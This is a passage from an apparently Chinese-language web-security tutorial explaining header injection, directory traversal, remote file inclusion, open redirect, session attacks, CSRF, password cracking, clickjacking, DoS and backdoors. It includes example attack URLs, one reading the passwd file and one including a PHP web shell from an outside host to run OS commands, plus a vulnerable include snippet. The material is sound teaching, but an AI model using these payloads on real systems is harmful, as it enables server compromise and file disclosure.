在可能進(jìn)行HTTP首部注入的環(huán)節(jié)，通過發(fā)送上面的字符串，返回結(jié)果得到以下這種響應(yīng)

Set-Cookie: UID=(%0D%0A ：換行符)
(%0D%0A ：換行符)
<HTML><HEAD><TITLE>之后，想要顯示的網(wǎng)頁(yè)內(nèi)容<!--(原來(lái)頁(yè)面對(duì)應(yīng)的首部字段和主體部分全視為注釋)

利用這個(gè)攻擊，已觸發(fā)陷阱的用戶瀏覽器會(huì)顯示偽造的Web頁(yè)面，再讓用戶輸入自己的個(gè)人信息等，可達(dá)到和跨站腳本攻擊相同的效果
　　另外，濫用HTTP/1.1中匯集多響應(yīng)返回功能，會(huì)導(dǎo)致緩存服務(wù)器對(duì)任意內(nèi)容進(jìn)行緩存操作。這種攻擊稱為緩存污染。使用該緩存服務(wù)器的用戶，在瀏覽遭受攻擊的網(wǎng)站時(shí)，會(huì)不斷地瀏覽被替換掉的Web網(wǎng)頁(yè)

攻擊方式5：郵件首部注入攻擊

下面以Web頁(yè)面中的咨詢表單為例講解郵件首部注入攻擊。該功能可在表單內(nèi)填入咨詢者的郵件地址及咨詢內(nèi)容后，以郵件的形式發(fā)送給網(wǎng)站管理員

攻擊方式6：目錄遍歷攻擊

目錄遍歷(Directory Traversal)攻擊是指對(duì)本無(wú)意公開的文件目錄，通過非法截?cái)嗥淠夸浡窂胶螅_(dá)成訪問目的的一種攻擊。這種攻擊有時(shí)也稱為路徑遍歷(Path Traversal)攻擊 , 固然存在輸出值轉(zhuǎn)義的問題，但更應(yīng)該關(guān)閉指定對(duì)任意文件名的訪問權(quán)限
下面以顯示讀取文件功能為例，講解目錄遍歷攻擊。該功能通過以下查詢字段，指定某個(gè)文件名。然后從www/log/文件目錄下讀取這個(gè)指定的文件
http://example.com/read.php?log=0401.log
攻擊者設(shè)置如下查詢字段后發(fā)出請(qǐng)求
http://example.com/read.php?log=../..etcpasswd
查詢字段為了讀取攻擊者盯上的etcpasswd文件，會(huì)從wwwlog/目錄開始定位相對(duì)路徑。如果這份read.php腳本接受對(duì)指定目錄的訪問請(qǐng)求處理，那原本不公開的文件就存在可被訪問的風(fēng)險(xiǎn)

攻擊方式7：遠(yuǎn)程文件包含漏洞

遠(yuǎn)程文件包含漏洞(Remote File Inclusion)是指當(dāng)部分腳本內(nèi)容需要從其他文件讀入時(shí)，攻擊者利用指定外部服務(wù)器的URL充當(dāng)依賴文件，讓腳本讀取之后，就可運(yùn)行任意腳本的一種攻擊 , 主要是PHP存在的安全漏洞 , 固然存在輸出值轉(zhuǎn)義的問題，但更應(yīng)控制對(duì)任意文件名的指定
下面以include讀入由查詢字段指定文件的功能為例，講解遠(yuǎn)程文件包含漏洞。該功能可通過以下查詢字段形式指定文件名，并在腳本內(nèi)的include語(yǔ)句處讀入這個(gè)指定文件
http://example.com/foo.php?mod=news.php
對(duì)應(yīng)腳本的源代碼如下所示
http://example.com/foo.php的源代碼(部分摘錄)

$modname=$_GET['mod'];
include($modname);

攻擊者指定如同下面形式的URL發(fā)出請(qǐng)求
http://example.com/foo.php?mod=http://hackr.jp/cmd.php&cmd=ls
攻擊者已事先在外部服務(wù)器上準(zhǔn)備了以下這段腳本
http://hackr.jp/cmd.php的源代碼
<?system($_GET['cmd'])?>
假設(shè)Web服務(wù)器(example.com)的include可以引入外部服務(wù)器的URL，那就會(huì)讀入攻擊者在外部服務(wù)器上事先準(zhǔn)備的URL(http://hackr.jp/cmd.php)。結(jié)果，通過system函數(shù)就能在Web服務(wù)器(example.com)上執(zhí)行查詢字段指定的OS命令了

安全漏洞二：設(shè)置或設(shè)計(jì)上有缺陷

指錯(cuò)誤設(shè)置web服務(wù)器，或是由設(shè)計(jì)上的一些問題引發(fā)的安全漏洞

攻擊方式1：強(qiáng)制瀏覽

對(duì)那些原本不愿公開的文件，為了保證安全會(huì)隱蔽其URL?？梢坏┲懒四切︰RL，也就意味著可瀏覽URL對(duì)應(yīng)的文件。直接顯示容易推測(cè)的文件名或文件目錄索引時(shí)，通過某些方法可能會(huì)使URL產(chǎn)生泄露
例如通過
http://www.example.com/entry/entry_081202.log
可以推出下一個(gè)文件是
http://www.example.com/entry/entry_081203.log
解決方案 : 直接通過URL訪問原本必須經(jīng)過認(rèn)證才能在Web頁(yè)面上使用的文件(HTML文件、圖片、PDF等文檔、CSS以及其他數(shù)據(jù)等)

攻擊方式2：不正確的錯(cuò)誤消息處理

簡(jiǎn)而言之 , 這個(gè)說(shuō)的就是程序出錯(cuò)或者業(yè)務(wù)出錯(cuò)一般都會(huì)爆出很具體很嚴(yán)謹(jǐn)?shù)腻e(cuò)誤信息 , 但是這個(gè)信息暴露給客戶端就不太好 , 會(huì)被人利用 , 給攻擊者啟發(fā) , 我們要控制好提供給客戶端信息的度

攻擊方式3：開放重定向

攻擊者把重定向指定的參數(shù)改寫成已設(shè)好陷阱的Web網(wǎng)站對(duì)應(yīng)的連接，如下所示
http://example.com/?redirect=http://hackr.jp
用戶看到URL后原以為訪問example.com，不料實(shí)際上被誘導(dǎo)至hackr.jp這個(gè)指定的重定向目標(biāo)
可信度高的Web網(wǎng)站如果開放重定向功能，則很有可能被攻擊者選中并用來(lái)作為釣魚攻擊的跳板

安全漏洞三：會(huì)話（session）管理疏忽

會(huì)話管理是用來(lái)管理用戶狀態(tài)的必備功能，但是如果在會(huì)話管理上有所疏忽，就會(huì)導(dǎo)致用戶的認(rèn)證狀態(tài)被竊取等后果

攻擊方式1：會(huì)話劫持

會(huì)話劫持

列舉幾種攻擊者可獲得會(huì)話ID的途徑：

• 通過非正規(guī)的生成方法推測(cè)會(huì)話ID；
• 通過竊聽或XSS攻擊盜取會(huì)話ID；
• 通過會(huì)話固定攻擊(Session Fixation)強(qiáng)行獲取會(huì)話ID

會(huì)話劫持攻擊案例

攻擊者在得知該Web網(wǎng)站存在可跨站攻擊(XSS)的安全漏洞后，就設(shè)置好用JavaScript腳本調(diào)用document.cookie以竊取Cookie信息的陷阱，一旦用戶踏入陷阱(訪問了該腳本)，攻擊者就能獲取含有會(huì)話ID的Cookie
　　攻擊者拿到用戶的會(huì)話ID后，往自己的瀏覽器的Cookie中設(shè)置該會(huì)話ID，即可偽裝成會(huì)話ID遭竊的用戶，訪問Web網(wǎng)站了

攻擊方式2：會(huì)話固定攻擊(被動(dòng)攻擊)

對(duì)以竊取目標(biāo)會(huì)話ID為主動(dòng)攻擊手段的會(huì)話劫持而言，會(huì)話固定攻擊(Session Fixation)攻擊會(huì)強(qiáng)制用戶使用攻擊者指定的會(huì)話ID
下面我們以認(rèn)證功能為例講解會(huì)話固定攻擊。這個(gè)Web網(wǎng)站的認(rèn)證功能，會(huì)在認(rèn)證前發(fā)布一個(gè)會(huì)話ID，若認(rèn)證成功，就會(huì)在服務(wù)器內(nèi)改變認(rèn)證狀態(tài)

會(huì)話固定攻擊案例

攻擊方式3：跨站點(diǎn)請(qǐng)求偽造(被動(dòng)攻擊)

跨站點(diǎn)請(qǐng)求偽造(Cross-Site Request Forgeries，CSRF)攻擊是指攻擊者通過設(shè)置好的陷阱，強(qiáng)制對(duì)已完成認(rèn)證的用戶進(jìn)行非預(yù)期的個(gè)人信息或設(shè)定信息等某些狀態(tài) 更新
　　跨站點(diǎn)請(qǐng)求偽造有可能會(huì)造成以下等影響：利用已通過認(rèn)證的用戶權(quán)限更新設(shè)定信息等；利用已通過認(rèn)證的用戶權(quán)限購(gòu)買商品；利用已通過認(rèn)證的用戶權(quán)限在留言板上發(fā)表言論

跨站點(diǎn)請(qǐng)求偽造攻擊案例

觸發(fā)陷阱之際，如果用戶A尚未通過認(rèn)證，則無(wú)法利用用戶A的身份權(quán)限在留言板上發(fā)表內(nèi)容

安全漏洞四：其他

攻擊方式1：密碼破解

密碼破解有以下兩種手段：通過網(wǎng)絡(luò)的密碼試錯(cuò)；對(duì)已加密密碼的破解(指攻擊者入侵系統(tǒng)，已獲得加密或散列處理的密碼數(shù)據(jù)的情況)
　　除去突破認(rèn)證的攻擊手段，還有SQL注入攻擊逃避認(rèn)證，跨站腳本攻擊竊取密碼信息等方法

密碼試錯(cuò):

• 窮舉法(Brute-force Attack，又稱暴力破解法)是指對(duì)所有密鑰集合構(gòu)成的 密鑰空間(Keyspace)進(jìn)行窮舉。比如銀行采用的個(gè)人識(shí)別碼是由“4位數(shù)字”組成的密碼，那么就要從0000~9999中的全部數(shù)字逐個(gè)進(jìn)行嘗試。從現(xiàn)實(shí)角度考量，攻擊是失敗的。
• 字典攻擊是指利用事先收集好的候選密碼(經(jīng)過各種組合方式后存入字典)，枚舉字典中的密碼，嘗試通過認(rèn)證的一種攻擊手法，還是舉銀行采用個(gè)人識(shí)別碼是“4位數(shù)字”的密碼的例子，考慮到用戶使用自己的生日做密碼的可能性較高，于是就可以把生日日期數(shù)值化，如將0101~1231保存成字典，進(jìn)行嘗試

對(duì)已加密密碼的破解：

• 通過窮舉法·字典攻擊進(jìn)行類推
  

  針對(duì)密碼使用散列函數(shù)進(jìn)行加密處理的情況，采用和窮舉法或字典攻擊相同的手法，嘗試調(diào)用相同的散列函數(shù)加密候選密碼，然后把計(jì)算出的散列值與目標(biāo)散列值匹配，類推出密碼

• 彩虹表
  彩虹表(Rainbow Table)是由明文密碼及與之對(duì)應(yīng)的散列值構(gòu)成的一張數(shù)據(jù) 庫(kù)表，是一種通過事先制作龐大的彩虹表，可在窮舉法·字典攻擊等實(shí)際破解過程中縮短消耗時(shí)間的技巧。從彩虹表內(nèi)搜索散列值就可以推導(dǎo)出對(duì)應(yīng)的明文密碼。

  為了提高攻擊成功率，擁有一張海量數(shù)據(jù)的彩虹表就成了必不可少的條件。例如在Free Rainbow Tables 網(wǎng)站上公布的一張由大小寫字母及數(shù)字全排列的1~8位字符串對(duì)應(yīng)的MD5散列值構(gòu)成的彩虹表，其大小約為1050吉字節(jié)。

• 拿到密鑰
  使用共享密鑰加密方式對(duì)密碼數(shù)據(jù)進(jìn)行加密處理的情況下，如果能通過某種手段拿到加密使用的密鑰，也就可以對(duì)密碼數(shù)據(jù)解密了

• 加密算法的漏洞
  考慮到加密算法本身可能存在的漏洞，利用該漏洞嘗試解密也是一種可行的方法。但是要找到那些已廣泛使用的加密算法的漏洞，又談何容易，因此困 難極大，不易成功
  而Web應(yīng)用開發(fā)者獨(dú)立實(shí)現(xiàn)的加密算法，想必尚未經(jīng)過充分的驗(yàn)證，還是 很有可能存在漏洞的

攻擊方式2：點(diǎn)擊劫持

點(diǎn)擊劫持(Click jack ing)是指利用透明的按鈕或鏈接做成陷阱，覆蓋在Web頁(yè)面之上。然后誘使用戶在不知情的情況下，點(diǎn)擊那個(gè)鏈接訪問內(nèi)容的一種攻擊手段。這種行為又稱為界面?zhèn)窝b(UI Redressing)

攻擊方式3：Dos攻擊

DoS 攻擊(Denial of Serv ice attack)是一種讓運(yùn)行中的服務(wù)呈停止?fàn)顟B(tài)的攻擊。有時(shí)也叫做服務(wù)停止攻擊或拒絕服務(wù)攻擊。DoS攻擊的對(duì)象不僅限于Web網(wǎng)站，還包括網(wǎng)絡(luò)設(shè)備及服務(wù)器等
　　主要有以下兩種DoS攻擊方式：

• 集中利用訪問請(qǐng)求造成資源過載，資源用盡的同時(shí)，實(shí)際上服務(wù)也就呈停止?fàn)顟B(tài)；
• 通過攻擊安全漏洞使服務(wù)停止
  　　其中，集中利用訪問請(qǐng)求的DoS攻擊，單純來(lái)講就是發(fā)送大量的合法請(qǐng)求。服務(wù)器很難分辨何為正常請(qǐng)求，何為攻擊請(qǐng)求，因此很難防止DoS攻擊

攻擊方式4：后門程序

后門程序(Backdoor)是指開發(fā)設(shè)置的隱藏入口，可不按正常步驟使用受限功能。利用后門程序就能夠使用原本受限制的功能。
　　通常的后門程序分為以下3種類型：

• 開發(fā)階段作為Debug調(diào)用的后門程序；
• 開發(fā)者為了自身利益植入的后門程序；
• 攻擊者通過某種方法設(shè)置的后門程序。
  　　可通過監(jiān)視進(jìn)程和通信的狀態(tài)發(fā)現(xiàn)被植入的后門程序。但設(shè)定在Web應(yīng)用中的后門程序，由于和正常使用時(shí)區(qū)別不大，通常很難發(fā)現(xiàn)。